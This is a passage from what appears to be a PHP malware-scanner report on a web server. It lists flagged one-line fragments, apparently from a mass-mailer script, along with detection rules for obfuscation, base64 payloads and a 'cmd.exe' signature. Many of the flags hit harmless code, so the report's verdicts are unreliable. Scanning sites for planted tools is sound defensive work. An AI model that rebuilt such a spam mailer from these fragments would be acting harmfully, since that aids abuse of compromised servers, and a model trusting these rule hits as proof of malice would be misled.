<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4041</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4052</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4062</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4302</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 596</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 629</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 692</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 944</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 946</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 960</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_96").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/mfruz.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 18:34:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 18:34:30</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_97" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
